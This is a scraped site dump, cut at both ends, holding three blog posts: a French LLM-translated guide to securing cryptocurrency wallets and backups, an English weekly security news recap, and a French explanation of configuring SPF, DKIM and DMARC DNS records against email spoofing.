n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nSi vous êtes impliqué dans les crypto-monnaies depuis assez longtemps, il y a de fortes chances que vous connaissiez l\u0026rsquo;adage « Not your keys, not your coins » (Pas vos clés, pas vos coins). L\u0026rsquo;article d\u0026rsquo;aujourd\u0026rsquo;hui abordera certaines des façons dont vous pouvez stocker vos coins en toute sécurité, ainsi que les stratégies de sauvegarde que vous pouvez employer en cas de problème.\nLes solutions présentées (génériques et d\u0026rsquo;un niveau relativement élevé) sont matière à réflexion pour les personnes ordinaires sans des millions de dollars d\u0026rsquo;investissements (les heureux millionnaires du Bitcoin pourraient recourir à des stratégies plus avancées et sur mesure). Vous devriez réfléchir à votre cas d\u0026rsquo;utilisation des crypto-monnaies, à ce avec quoi vous êtes à l\u0026rsquo;aise, puis définir ce qui vous convient.\nTypes de stockage de coins # Avant d\u0026rsquo;aborder les différentes options de stockage à votre disposition, introduisons quelques concepts généraux. Il existe généralement deux types de portefeuilles de crypto-monnaies :\nLes portefeuilles chauds (Hot Wallets) sont les plus pratiques. Ils fonctionnent sur un ordinateur ou un smartphone et sont connectés à Internet. Les plateformes d\u0026rsquo;échange, les portefeuilles en ligne et les portefeuilles logiciels sont tous des portefeuilles chauds. Les portefeuilles froids (Cold Wallets) sont les plus sécurisés car ce sont des dispositifs matériels stockant les clés hors ligne. Cela signifie que même si vos systèmes sont compromis, vos coins restent en sécurité. Trezor et les portefeuilles papier sont des exemples de portefeuilles froids. Exchanges et portefeuilles en ligne # Ce sont les options les plus pratiques, et si vous êtes nouveau dans les crypto-monnaies, il y a de fortes chances que ce soit ce que vous faites.\nLes avantages de stocker vos coins dans un portefeuille custodial sont que :\nVous n\u0026rsquo;avez pas besoin de vous soucier du stockage des clés ou de l\u0026rsquo;exécution d\u0026rsquo;un logiciel Si vous voulez échanger vos coins, vous n\u0026rsquo;avez pas besoin d\u0026rsquo;envoyer de l\u0026rsquo;argent à l\u0026rsquo;exchange au préalable Cependant, donner le contrôle total de vos coins à un exchange signifie que :\nL\u0026rsquo;exchange pourrait bloquer vos fonds pour n\u0026rsquo;importe quelle raison (« Attendez, nous avons reçu un appel du fisc et ils ne sont pas contents de votre dernière déclaration fiscale ») L\u0026rsquo;exchange peut voir tout ce que vous faites Il existe de multiples cas de grands exchanges comme Coinbase temporairement inutilisables quand le prix du Bitcoin chute brusquement Les exchanges sont régulièrement piratés, et parfois les dirigeants partent avec l\u0026rsquo;argent. En août dernier, 97 millions de dollars ont été volés à Liquid, un exchange majeur (voir une liste des piratages au fil des années ici). Parfois, les clients sont remboursés après le piratage, parfois non. En conclusion, stocker vos actifs sur des exchanges est quelque chose que vous devriez éviter si vous voulez garder vos fonds en sécurité. Bien sûr, si vous n\u0026rsquo;avez que de très petits avoirs (quelques centaines de dollars), ou si vous faites du trading haute fréquence (auquel cas vous devriez quand même envisager de ne pas garder tous vos actifs en ligne), alors il est probablement encore acceptable de stocker une partie de vos fonds en ligne.\nSi vous choisissez tout de même d\u0026rsquo;utiliser des portefeuilles custodials pour stocker vos fonds, faites-vous une faveur et utilisez l\u0026rsquo;authentification à deux facteurs TOTP/Yubikey plutôt que par SMS. Il existe de multiples cas de personnes dont les comptes ont été piratés après des attaques par échange de carte SIM.\nPortefeuilles logiciels # Les portefeuilles logiciels sont le niveau suivant après les solutions de stockage custodial en termes de sécurité. Ils offrent un contrôle total de vos coins, mais « Un grand pouvoir implique de grandes responsabilités ». Si vous ne sécurisez pas correctement votre machine et/ou ne sauvegardez pas votre phrase de récupération, vous pouvez tout perdre sans aucune possibilité de récupérer les fonds.\nDans cette catégorie, il existe deux types de portefeuilles :\nLes nœuds complets, tels que Bitcoin Core, téléchargeront toute la blockchain et revalideront chaque bloc Les portefeuilles légers, tels qu\u0026rsquo;Electrum, s\u0026rsquo;appuieront sur d\u0026rsquo;autres serveurs pour télécharger toute la blockchain et fournir les dernières informations de transactions Pour la plupart des gens, faire tourner un nœud complet est très peu pratique, car cela nécessitera beaucoup d\u0026rsquo;espace pour chaque coin que vous possédez. De plus, la synchronisation initiale est assez longue et consommatrice de réseau et d\u0026rsquo;énergie. Les portefeuilles légers, en revanche, sont faciles à configurer, n\u0026rsquo;utilisent pas beaucoup de ressources système et vous permettent de gérer plusieurs coins sur plusieurs plateformes.\nSi vous décidez de configurer un portefeuille local, vous aurez beaucoup de choix. Si vous n\u0026rsquo;êtes intéressé que par Bitcoin, Electrum (qui permet de créer des portefeuilles multi-signatures pour plus de sécurité) est une option recommandée. Si vous voulez gérer plusieurs coins et utiliser à la fois des ordinateurs et des appareils mobiles, vous pouvez envisager des options comme Exodus (au moins partiellement à code source fermé, pas d\u0026rsquo;audit tiers, à ma connaissance. À utiliser à vos risques et périls). Pour plus d\u0026rsquo;options, vous pouvez consulter le site web du développeur pour le coin que vous souhaitez détenir (par exemple, ici pour Ethereum)\nLors de la configuration d\u0026rsquo;un nouveau portefeuille, je recommande de :\nChoisir un mot de passe fort pour protéger votre portefeuille Configurer un verrouillage automatique, pour vous assurer que votre portefeuille ne reste pas déverrouillé trop longtemps Vous assurer de sauvegarder votre phrase de récupération secrète (ne pas le faire peut entraîner la perte de tous vos fonds) Activer l\u0026rsquo;authentification à deux facteurs si possible Ne pas stocker de fonds importants sur votre smartphone, et envisager d\u0026rsquo;utiliser un appareil dédié si vous stockez des sommes décentes Les portefeuilles logiciels ne sont pas recommandés pour de gros avoirs. Je ne stockerais pas plus de quelques milliers de dollars dessus Portefeuilles matériels # Enfin et surtout, les portefeuilles matériels sont ceux offrant le plus de sécurité. Ils vous coûteront cependant généralement de l\u0026rsquo;argent et seront un peu moins pratiques qu\u0026rsquo;un portefeuille logiciel que vous pouvez utiliser à tout moment sans rien d\u0026rsquo;autre que votre téléphone ou votre ordinateur.\nIl existe deux types de portefeuilles matériels. Les non-électroniques et les électroniques. Le premier type inclut des choses comme les portefeuilles papier. Ils sont simples et gratuits à configurer. Au final, vous aurez un morceau de papier avec un QR code pour votre clé privée et un pour votre clé publique. Les principaux inconvénients sont que dépenser des fonds n\u0026rsquo;est pas très convivial, et le papier est facilement détruit.\nLe deuxième type de portefeuille matériel est celui qui nous intéresse le plus ici. Les options les plus connues sont Trezor et Ledger. La façon d\u0026rsquo;utiliser ces appareils est assez simple. La première fois qu\u0026rsquo;ils sont allumés, ils génèrent une phrase de récupération que vous devez absolument sauvegarder. Ensuite, vous configurez un mot de passe pour sécuriser l\u0026rsquo;accès aux appareils (qui seront effacés après un certain nombre de tentatives erronées), et ils sont prêts à l\u0026rsquo;emploi. Lorsqu\u0026rsquo;ils sont branchés à votre ordinateur, vous pouvez utiliser le logiciel fourni par les entreprises respectives pour voir, envoyer, échanger vos actifs, générer des adresses et signer des choses. Même si votre ordinateur est compromis, vos fonds sont en sécurité. Premièrement, vous n\u0026rsquo;entrez jamais le mot de passe directement via l\u0026rsquo;ordinateur, deuxièmement, pour chaque opération que vous effectuez, l\u0026rsquo;écran du ledger affichera les adresses et la somme impliquées, et vous devez les confirmer en appuyant sur un bouton. Enfin, toutes les signatures sont effectuées sur le ledger, donc votre ordinateur ne voit jamais votre phrase de récupération ni aucune clé privée.\nMa préférence personnelle va au Trezor, pour plusieurs raisons :\nJe trouve l\u0026rsquo;interface meilleure, et vous avez le choix entre une interface web ou un programme standard Le Trezor vous permet de définir un mot de passe supplémentaire qui sera utilisé pour dériver les clés. Cela signifie que même si quelqu\u0026rsquo;un trouvait votre phrase de récupération, il aurait encore besoin de connaître le mot de passe pour accéder à vos coins Il est livré avec diverses options telles que le chiffrement GPG, le gestionnaire de mots de passe, la gestion des clés SSH, Shamir Backup, \u0026hellip; Cela étant dit, si vous envisagez d\u0026rsquo;en acheter un, vous devriez comparer les différentes options qu\u0026rsquo;ils offrent et décider ce qui est le mieux pour vous. Le Ledger a aussi certains avantages, comme le fait qu\u0026rsquo;il a été audité par l\u0026rsquo;ANSSI (Agence nationale de la sécurité des systèmes d\u0026rsquo;information), et qu\u0026rsquo;il est doté du Bluetooth.\nSi vous avez des avoirs importants, il pourrait être bénéfique de diversifier le matériel que vous utilisez pour stocker vos coins (c\u0026rsquo;est-à-dire utiliser du matériel de plusieurs fabricants). Aussi, notez qu\u0026rsquo;au final, les portefeuilles matériels sont des dispositifs électroniques branchés à votre ordinateur. Ils sont généralement considérés comme sûrs, mais cela ne signifie pas qu\u0026rsquo;il n\u0026rsquo;y a aucune possibilité qu\u0026rsquo;ils soient un jour piratés (même s\u0026rsquo;il n\u0026rsquo;y a pas de cas documenté à ma connaissance).\nStratégies de sauvegarde # Les sauvegardes sont là où les choses peuvent se compliquer, car vous voulez être sûr d\u0026rsquo;avoir les phrases de récupération facilement disponibles, mais personne ne devrait pouvoir mettre la main dessus et dépenser vos fonds durement gagnés.\nSi vous utilisez un portefeuille local, les choses sont relativement simples. Puisque votre ordinateur stocke les clés et affiche la phrase de récupération lors de la configuration du portefeuille, vous pourriez simplement prendre trois clés USB, créer un conteneur Veracrypt (que vous voulez sécuriser avec des mots de passe très forts) sur chacune, et y écrire la clé. Ensuite, vous pouvez garder une clé USB chez vous en cas de problème avec votre ordinateur (pour pouvoir toujours accéder à votre portefeuille), et les deux autres dans des endroits de confiance. Par exemple, une chez un proche et une dans un coffre-fort à votre banque. Vous ne devez jamais avoir toutes vos sauvegardes au même endroit. La raison est simple : si vous avez toutes vos sauvegardes chez vous et que votre maison brûle, tous les fonds sont perdus.\nLes choses se compliquent quand vous voulez faire une sauvegarde pour un portefeuille froid, puisque tout l\u0026rsquo;intérêt est que la clé ne touche jamais votre ordinateur. À partir de là, plusieurs stratégies peuvent être appliquées.\nLa stratégie YOLO\nLa « stratégie YOLO » : vous faites confiance au fait que votre ordinateur n\u0026rsquo;est pas infecté au moment présent et qu\u0026rsquo;aucun fichier temporaire ou quoi que ce soit du genre ne sera créé si vous éditez un fichier texte, et vous utilisez la stratégie des trois clés USB mentionnée précédemment. Cela pourrait fonctionner, mais cela brise l\u0026rsquo;objectif du stockage à froid dans une certaine mesure et je ne le recommande pas.\nLa stratégie YOLO améliorée\nUne stratégie un peu meilleure est de démarrer un ordinateur en utilisant un système comme Tails, et d\u0026rsquo;utiliser la même stratégie de sauvegarde sur trois clés USB. Les plus paranoïaques d\u0026rsquo;entre nous diront que ce n\u0026rsquo;est pas bon parce que de l\u0026rsquo;électronique est impliquée, mais c\u0026rsquo;est une solution raisonnable.\nSauvegarde analogique simple\nVous pourriez utiliser les papiers fournis avec le ledger, y écrire la clé, en cacher un chez vous et mettre l\u0026rsquo;autre dans un coffre-fort à la banque.\nLe problème avec cela est que si quelqu\u0026rsquo;un met la main sur le papier de la phrase de récupération, il peut tout dépenser. Cela pourrait arriver si votre maison est cambriolée, si votre coffre est saisi, ou accédé par du personnel bancaire corrompu.\nUn autre problème est que le papier est assez facilement détruit. Cela peut cependant facilement être résolu en utilisant des plaques d\u0026rsquo;acier ou quelque chose de similaire pour inscrire votre phrase de récupération.\nLa stratégie Shamir\nEn utilisant le Shamir Backup, vous pouvez générer plusieurs parts de votre phrase de récupération et les distribuer à différentes personnes et endroits. Par exemple, vous pourriez générer un schéma 2-sur-3, en garder un chez vous et mettre les deux autres dans différents coffres-forts dans différentes banques. Avec ce schéma, seules deux parts sont nécessaires, donc si quelqu\u0026rsquo;un parvient à en voler une, ou si une est perdue, vous pouvez toujours accéder à vos fonds avec les deux restantes.\nVous pouvez utiliser jusqu\u0026rsquo;à 16 parts de récupération, ce qui permet de nombreuses combinaisons selon votre modèle de confiance. Par exemple, un schéma 7-sur-10 nécessiterait qu\u0026rsquo;un attaquant mette la main sur 7 parts de la phrase, tout en permettant d\u0026rsquo;en perdre trois.\nTirer parti du mot de passe Trezor\nPuisque le Trezor vous permet de créer un mot de passe qui sera utilisé en plus de la phrase de récupération, cela offre un peu de sécurité puisque la phrase compromise seule ne suffit pas à compromettre vos fonds. Dans ce cas, vous pourriez simplement utiliser la « stratégie de sauvegarde analogique simple » et garder le mot de passe du portefeuille dans votre gestionnaire de mots de passe.\nNotez qu\u0026rsquo;il existe de multiples variations de stratégies qui peuvent être employées. Par exemple, vous pourriez laisser des fonds sur un portefeuille sans mot de passe, puis avoir un portefeuille BTC avec un mot de passe A, et un portefeuille ETH avec un mot de passe B. Vous pouvez utiliser autant de mots de passe que vous voulez avec le même Trezor/phrase de récupération.\nConsidérations supplémentaires pour les sauvegardes\nUne chose à considérer lors de la création de votre stratégie de sauvegarde est ce qu\u0026rsquo;il adviendra des coins si quelque chose vous arrive. Contrairement aux banques, vos fonds seront absolument impossibles à récupérer sans les clés appropriées.\nPour remédier à cela, vous pourriez examiner les stratégies précédentes et réfléchir à comment les adapter pour permettre la récupération des fonds si quelque chose vous arrive. Vous devez réfléchir à ce avec quoi vous êtes à l\u0026rsquo;aise, mais un exemple de base pourrait être de distribuer des parts Shamir Backup à des personnes de confiance, puis de laisser une liste des personnes détenant une clé à votre notaire (après avoir donné des instructions aux détenteurs de parts sur à qui ils devraient ou ne devraient pas donner la part).\nCrédits et lectures complémentaires # Lectures complémentaires # Shamir Backup Trezor Passphrase bitcoin.it wiki bitkey - un live cd/usb autonome pour le air-gap How should I store my bitcoin? SmartCustody: Simple Self-Custody Cold Storage Scenario Crédits # Photo de couverture par CardMapr / Unsplash ","date":"2021-10-14","externalUrl":null,"permalink":"/fr/posts/2021/how-to-keep-your-coins-safe-the-different-options/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nSi vous êtes impliqué dans les crypto-monnaies depuis assez longtemps, il y a de fortes chances que vous connaissiez l’adage « Not your keys, not your coins » (Pas vos clés, pas vos coins). L’article d’aujourd’hui abordera certaines des façons dont vous pouvez stocker vos coins en toute sécurité, ainsi que les stratégies de sauvegarde que vous pouvez employer en cas de problème.\n","title":"Comment garder vos coins en sécurité : les différentes options","type":"posts"},{"content":"As every week, here is our news summary regarding APTs, Cryptocurrencies, Darknet, General Security, and ransomware. All of that in about a thousand words.\nAdditionally, we wrote an article on How to Protect Yourself from People Impersonating You via Email using DKIM, SPF, and DMARC.\nAPT # Academics discover hidden layer in China\u0026rsquo;s Great Firewall (The Record)\nResearchers at the University of Maryland discovered a previously unknown layer in the Great Firewall of China. This extra layer is believed to allow redundancy to the already existing HTTPS filtering system based on the Server Name Indication, which is an extension of TLS that allows seeing the website to which the client is trying to connect.\nGoogle warns 14,000 Gmail users targeted by Russian hackers (Bleeping Computer)\nGoogle warned about 14,000 Gmail users that they were targeted by state-sponsored phishing attacks from APT28 (also known as Fancy Fear) which is believed to be part of the Russian GRU.\nRussian cyberattacks pose greater risk to governments and other insights from our annual report (Microsoft Blog)\nMicrosoft published its annual digital defence report for 2021. It highlights that 58% of the nation-state attacks they observed were coming from Russia, which is increasingly attacking government agencies (3% of the targets one year ago compared to 53% now) and gaining efficiency (21% of successful compromise last year vs 32% now). The report also explores other APTs and digital threats such as ransomware.\nCryptocurrencies # Justice Department Sets Up National Cryptocurrency Enforcement Team (Wall Street Journal)\nThe US Department of Justice announced the creation of a Cryptocurrency Enforcement Team to go after criminals involved with cryptocurrency activity such as money laundering, theft, or ransomware.\nHackers bypass Coinbase 2FA to steal customer funds (The Record)\nCoinbase submitted a notification letter to the US state attorney general office stating that intrusions took place this year between March and May. A third party took advantage of Coinbase\u0026rsquo;s SMS account recovery process to breach 6,000 accounts. The company said it will reimburse the amounts lost during the intrusion.\nDarknet # White House Market to Close Down (Ixonae on Security)\nMr White, the White House Market administrator announced on October 1st that he would retire after fulfilling his goal. He announced that he would give enough time for the market\u0026rsquo;s users to finish their transactions and withdraw their funds.\nTor2Door was Thought to be Exit Scamming Earlier this Week (Twitter)\nAfter some users of the Tor2Door market encountered issues with funds withdrawing, Paris, one of the Dread forum administrators posted an announcement stating that the market had probably exit scammed. After the Tor2Door administrator reached out, he withdrew his original post and announced that all was probably ok and that the situation was monitored.\nGeneral Security # Symphony Technology Group Announces Bryan Palma Appointment (Business Wire)\nThe Symphony Technology Group, a private equity firm focused on software, data, and analytics, announced its acquisition of FireEye Products, and FireEye merge with McAffee enterprise. The two combined entities will have more than 40,000 customers, 5,000 employees, and about USD 2 million of revenue.\nActively exploited Apache 0-day also allows remote code execution (Bleeping Computer)\nThe CVE-2021-41773 taking advantage of a vulnerability in Apache\u0026rsquo;s CGI mod was found to allow path traversal earlier this month. After some PoC surfaced on the Internet, it became clear that the flaw is more critical than first thought, as it allows remote code execution as well. Among other things, the vulnerability requires an Apache version 2.4.49 to be exploited.\nAnonymous leaks Twitch source code and business data on 4chan (The Record)\nIndividuals claiming to be part of Anonymous leaked source code and various business data (allegedly including streamers payout data) belonging to Twitch (the video streaming platform) on 4chan. The authors claimed that the reason for their actions is in response to the Twitch \u0026ldquo;community [being] a disgusting toxic cesspool\u0026rdquo;. The leak is 128 GB large and contains 6,000 internal Git repositories.\nPut Your Finger on the Pulse of What\u0026rsquo;s New with the YubiKey Bio Series (Yubico)\nYubico released the first YubiKey supporting biometric (fingerprint) authentication after it was previewed at Microsoft Ignite in 2019. The key will come in USB-3 and USB-C variants for USD 80.\nBotnet abuses TP-Link routers for years in SMS messaging-as-a-service scheme (The Record)\nResearchers discovered that a malicious actor was hacking TP-Link routers since at least 2016. The routers were used to send betting tips, confirmation of online payment and donations, and messages whose meaning is still to be understood.\nPrivacy # Largest mobile SMS routing firm discloses five-year-long breach (Bleeping Computer)\nSyniverse, a company providing \u0026ldquo;nearly every mobile communications provider, the largest global banks, the world\u0026rsquo;s biggest tech companies\u0026rdquo; (including Vodafone, AT\u0026amp;T, T mobile, Verizon, \u0026hellip;) with text messaging routing services, announced that hackers had access to its database for over five years, and compromised login credentials belonging to hundreds of customers.\nThe Telegraph exposes 10 TB database with subscriber info (Bleeping Computer)\nA researcher discovered that 10 TB of data belonging to The Telegraph, one of the biggest British newspapers was accessible online and non-protected. It contained the data of at least 1,200 subscribers including their name, email and IP addresses as well as authentication tokens. It took the newspaper two days to reply to the findings and address the issue.\nOver 1.5 billion Facebook users\u0026rsquo; personal data found for sale on hacker forum (Tech Republic)\nThe personal data of over 1.5 billion Facebook users are reportedly being sold online. It contains names, email addresses, locations, and phone numbers, but there is no indication that Facebook suffered any kind of breach. The data was likely obtained through scrapping.\nApple says apps must offer a way to delete your account starting in early 2022 (Engaget)\nApple announced that from January 31st, 2022, all the developers who let their iOS and macOS applications users create accounts will have to provide a way to delete these accounts from the application.\nRansomware # Lawsuit claims ransomware attack caused fatal injury to infant at Alabama hospital (Tech Republic)\nAn Alabama hospital was hit by ransomware in 2019, which caused some monitoring material to not work properly during a childbirth, inflicting the child brain damages. He died 9 months later in the first alleged death by ransomware. The Wall Street Journal reported that a lawsuit was filed by the mother.\nUS unites 30 countries to disrupt global ransomware attacks (Bleeping Computer)\nUS\u0026rsquo;s president, Joe Biden, announced that the US will \u0026ldquo;bring together 30 countries to accelerate [their] cooperation in combating cybercrime, improving law enforcement collaboration, stemming the illicit use of cryptocurrency, and engaging on these issues diplomatically\u0026rdquo;. This comes after ransomware caused major issues, such as during Colonial Pipeline\u0026rsquo;s attack earlier this year.\nConti gang threatens to dump victim data if ransom negotiations leak to reporters (The Record)\nAfter payment negotiation chats were shared publicly, the Conti ransomware group threatened hacked companies in a public statement. The group said that in case of leaks, they would publish the victims\u0026rsquo; data, or someone\u0026rsquo;s else if it is done after the ransom was paid and the data deleted by the operator.\nRansomware gang arrested in Ukraine with Europol\u0026rsquo;s support (Europol)\nOn September 28th, a coordinated strike involving the French National Gendarmerie, the Ukrainian National Police, and the FBI, in collaboration with Europol and Interpol arrested two prolific ransomware operators in Ukraine and sized the equivalent of about USD 2 million of assets. The ransomware group is suspected of having committed attacks against very large industrial groups in Europe and North America from April 2020, demanding ransoms ranging between EUR 5 and EUR 70 million.\nWarren \u0026amp; Ross Introduce Bill to Require Disclosures of Ransomware Payments (warren.senate.gov)\nUS Senator Warren and Representative Ross introduced a bill to help to tackle ransomware. It would require companies to disclose information (such as amount, the currency used, any information about the extortioner \u0026hellip;) about ransomware payment within 48 hours after paying. The Department of Homeland Security would also be required to make public the information, excluding identifying information.\nInteresting Long Reads # Even Censors Have a Backup: Examining China\u0026rsquo;s Double HTTPS Censorship Middleboxes Illegal Activities Endure on China\u0026rsquo;s Dark Web Despite Strict Internet Control (Recorded Future - Full PDF here) Microsoft Digital Defence Report 2021 ","date":"2021-10-08","externalUrl":null,"permalink":"/blog/weekly-news-recap-9/","section":"News","summary":"As every week, here is our news summary regarding APTs, Cryptocurrencies, Darknet, General Security, and ransomware. All of that in about a thousand words.\nAdditionally, we wrote an article on How to Protect Yourself from People Impersonating You via Email using DKIM, SPF, and DMARC.\n","title":"Weekly News Recap 9","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nDe nos jours, les emails sont une forme de communication massivement utilisée. Par conséquent, ils sont aussi massivement utilisés comme vecteur d\u0026rsquo;attaque. 75 % des organisations dans le monde auraient subi du phishing en 2020, et jusqu\u0026rsquo;à 95 % des attaques d\u0026rsquo;ingénierie sociale pourraient être délivrées par email. Bien sûr, il n\u0026rsquo;y a pas de solution miracle pour empêcher toutes ces attaques, mais il existe quelques mécanismes qui peuvent aider à empêcher des personnes malveillantes de se faire passer pour vous par email. Ces mécanismes ne nécessitent que quelques entrées DNS (sauf si vous gérez votre propre serveur de messagerie, ce que nous ne couvrirons pas ici). Encore mieux, configurer ces entrées DNS améliorera également la délivrabilité de vos emails, car ils seront moins susceptibles d\u0026rsquo;être signalés comme spam.\nSender Policy Framework (SPF) # En termes simples, SPF permet de lister les serveurs autorisés à envoyer des emails en utilisant un nom de domaine. Lorsqu\u0026rsquo;un email est envoyé, le serveur destinataire interrogera l\u0026rsquo;entrée SPF du domaine de l\u0026rsquo;expéditeur (récupéré depuis le envelope-from) et la comparera avec le serveur depuis lequel il reçoit l\u0026rsquo;email. Si cela ne correspond pas, l\u0026rsquo;email pourrait être signalé ou rejeté (en fin de compte, c\u0026rsquo;est le serveur destinataire qui décide de ce qu\u0026rsquo;il veut faire).\nLa configuration est assez simple, car il suffit d\u0026rsquo;ajouter une entrée TXT à votre configuration DNS. Par exemple, ce qui suit (contenu d\u0026rsquo;une entrée DNS TXT) autorise tous les emails provenant de 1.1.1.1, 192.168.0.1/8, et l\u0026rsquo;enregistrement A de example.com, et indique que les autres serveurs ne sont pas autorisés à envoyer des emails pour ce nom de domaine. Notez qu\u0026rsquo;une règle ne peut pas avoir plus de 10 lookups (par exemple, la résolution d\u0026rsquo;entrées a).\nv=spf1 ip4:1.1.1.1 ip4:192.168.0.1/8 a:example.com -all\nEn plus d\u0026rsquo;autoriser les adresses et plages IP v4, les noms de domaine, de nombreuses autres options telles que l\u0026rsquo;IP v6 et MX sont disponibles.\nAu lieu d\u0026rsquo;utiliser -all pour faire échouer la vérification SPF si les emails ne sont pas envoyés depuis un serveur autorisé, ~all pourrait être utilisé pour produire un soft-fail, ?all pour indiquer que rien ne peut être dit sur les adresses non explicitement marquées. +all pourrait aussi être utilisé pour signaler que tout serveur est autorisé à envoyer des emails au nom de notre nom de domaine.\nTout cela est bien, mais SPF n\u0026rsquo;est pas parfait. Disons que vous avez configuré votre boîte mail email@example.com pour transférer automatiquement les emails vers email@example.net. Si j\u0026rsquo;envoie un email depuis une IP non autorisée par SPF à email@example.com, email@example.net ne verra pas que le SPF original est invalide.\nDomain Keys Identified Mail (DKIM) # Nous avons mentionné dans la partie précédente que SPF seul ne suffit pas à garantir l\u0026rsquo;authentification des emails pour des raisons telles que le fait d\u0026rsquo;être ignoré lorsque les emails sont transférés. DKIM est une autre option pour authentifier les emails, et il a l\u0026rsquo;avantage de ne pas être perdu lorsque les emails sont transférés.\nLe fonctionnement de DKIM est assez simple. Le domaine de l\u0026rsquo;expéditeur doit avoir une entrée DNS (vous devrez vous référer à votre fournisseur d\u0026rsquo;hébergement de messagerie pour voir comment il attend que les choses soient configurées) avec une clé publique. La clé privée correspondante sera utilisée pour signer les emails envoyés. Lorsqu\u0026rsquo;un email est reçu, le serveur destinataire récupérera la clé publique depuis les enregistrements DNS du nom de domaine utilisé par l\u0026rsquo;expéditeur, et vérifiera que la signature est correcte.\nRegardons un exemple. Ce qui suit fait partie de l\u0026rsquo;en-tête d\u0026rsquo;un email reçu qui a été envoyé depuis un serveur utilisant DKIM.\nDkim-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=haveibeenpwned.com; h=content-type:from:mime-version:to:subject:list-unsubscribe; s=s1; bh=XnUR5B4bb9/iGnKkBNkjeCE5H9eTJoZZhuc28eSwj/Y=; b=CwFiOJD nrpW8docGIVBd/A+bPcOjmmVg0letY5gf43QQTSD3V1bJ4wkt3l1LSBT1uDqhkzK QxBQttzZIxnmcYY5E/sP/tj1UseO0KEBq/s6Mt1X5AHtvDScaIJgoTfeay3sIU+O 6Edb/G0uCDhSW6JY8gAnXgVKFcooGBp43+yk= Nous pouvons voir plusieurs champs :\na=rsa-sha256 nous donne les algorithmes utilisés pour signer le message c=relaxed/relaxed définit la posture de canonicalisation du domaine expéditeur. Ici, la configuration effectuera un certain reformatage avant de hacher le message, comme mettre les noms d\u0026rsquo;en-têtes en minuscules, supprimer les espaces en fin de ligne et autres. Une autre option serait d\u0026rsquo;utiliser strict au lieu de relaxed, ce qui exigerait que le contenu soit 100 % identique, sous peine de voir la validation échouer. Par exemple, c=relaxed/strict autoriserait le reformatage des en-têtes de l\u0026rsquo;email, mais exigerait que le corps reste strictement inchangé. L\u0026rsquo;option relaxed est pratique pour éviter les échecs inutiles, car les serveurs de messagerie peuvent parfois reformater les en-têtes pendant le traitement d=haveibeenpowned.com nous indique pour quel domaine la signature a été faite h=[...] liste les en-têtes qui étaient présents lorsque le message a été signé (et qui ont donc été inclus dans le hash) s=s1 indique que le sélecteur pour la clé publique du domaine est s1. Il sera expliqué plus tard bh=[...] contient le hash en base64 du corps canonicalisé du message. Notez qu\u0026rsquo;une option l pourrait être fournie dans les paramètres, pour spécifier la longueur maximale du corps utilisée pour calculer le hash. Cela signifie que du contenu pourrait être ajouté après la longueur l et le DKIM serait toujours valide b=[...] contient la signature en base64 Lorsque le serveur destinataire reçoit le message, il essaiera de voir si la signature fournie dans b est valide. Pour cela, il effectuera une requête DNS pour obtenir la clé du domaine qui a envoyé l\u0026rsquo;email, et recevra ce qui suit :\nuser@Host ~ % dig TXT s1._domainkey.haveibeenpwned.com [...] ;; ANSWER SECTION: s1._domainkey.haveibeenpwned.com. 300 IN CNAME\ts1.domainkey.u3489673.wl174.sendgrid.net. s1.domainkey.u3489673.wl174.sendgrid.net. 474 IN TXT \u0026#34;k=rsa; t=s; p=[key]\u0026#34; Vous remarquerez le s1 dans la requête dig. C\u0026rsquo;est la valeur du sélecteur qui se trouvait dans le champ s de l\u0026rsquo;en-tête DKIM de l\u0026rsquo;email. Les entrées DKIM seront toujours stockées pour [sélecteur]._domainkey.domain.tld.\nUne fois qu\u0026rsquo;il a obtenu la clé fournie dans la réponse DNS, le serveur destinataire vérifiera que la signature est valide et correspond au contenu. Si ce n\u0026rsquo;est pas le cas, la vérification échoue. Sinon, quelque chose ressemblant à ce qui suit sera ajouté aux en-têtes de l\u0026rsquo;email.\nAuthentication-Results: mailin007.protonmail.ch; dkim=pass (1024-bit key) header.d=haveibeenpwned.com header.i=@haveibeenpwned.com header.b=\u0026#34;EwFk1JDn\u0026#34; Domain-based Message Authentication, Reporting and Conformance (DMARC) # Si vous avez suivi tout jusqu\u0026rsquo;ici, l\u0026rsquo;adresse de votre serveur de messagerie fait maintenant partie d\u0026rsquo;une entrée SPF, et vos messages sont signés grâce à DKIM. C\u0026rsquo;est bien, mais que se passe-t-il si un attaquant décide de forger un message et de l\u0026rsquo;envoyer depuis son serveur (sans inclure de DKIM) ? Dans ce scénario, l\u0026rsquo;email sera probablement accepté par le serveur destinataire et finira dans la boîte du destinataire.\nC\u0026rsquo;est là que DMARC entre en jeu. Ce mécanisme a les avantages suivants :\nIl permet de donner des directives aux serveurs de messagerie destinataires sur la façon de traiter les emails échouant aux vérifications SPF ou DKIM (même s\u0026rsquo;il n\u0026rsquo;y a aucune obligation pour les serveurs de les appliquer) Il permet des options supplémentaires pour gérer SPF avec les sous-domaines (notez que les serveurs correspondant à ~all seront marqués comme un échec) Il permet d\u0026rsquo;obtenir des retours sur les emails envoyés en utilisant notre nom de domaine, ce qui est pratique pour le débogage ou la détection d\u0026rsquo;activité malveillante DMARC vérifie que l\u0026rsquo;en-tête Mailfrom du RFC5321 et l\u0026rsquo;en-tête Mailfrom du RFC5322 correspondent pour combler une faiblesse de DMARC et SPF Comme pour les deux autres éléments, DMARC est configuré via un seul champ DNS TXT qui sera situé à _dmarc.domain.com. L\u0026rsquo;extrait suivant montre un exemple de configuration.\nv=DMARC1; p=reject; sp=reject; ruf=mailto:security@example.com; aspf=s; adkim=s; fo=1; Examinons les différents champs :\nv (obligatoire) est la version DMARC (toujours DMARC1) p (obligatoire) définit la politique pour le domaine envoyé depuis example.com dans le cas où la vérification SPF ou DKIM échoue. S\u0026rsquo;il est défini à reject, rien ne finira dans les boîtes mail des utilisateurs, quarantine enverra les emails dans le spam, et none ne fera rien po fait la même chose que p mais pour les sous-domaines ruf permet de définir une adresse email qui recevra des rapports forensiques lorsque des emails échouent à la validation. rua est une option similaire qui enverra des rapports agrégés quotidiens (moins détaillés) de l\u0026rsquo;activité impliquant notre domaine (par exemple, si vous envoyez des emails à Gmail pendant la journée, Gmail vous enverra un rapport agrégeant les différentes opérations à la fin de la journée). Notez que certains serveurs 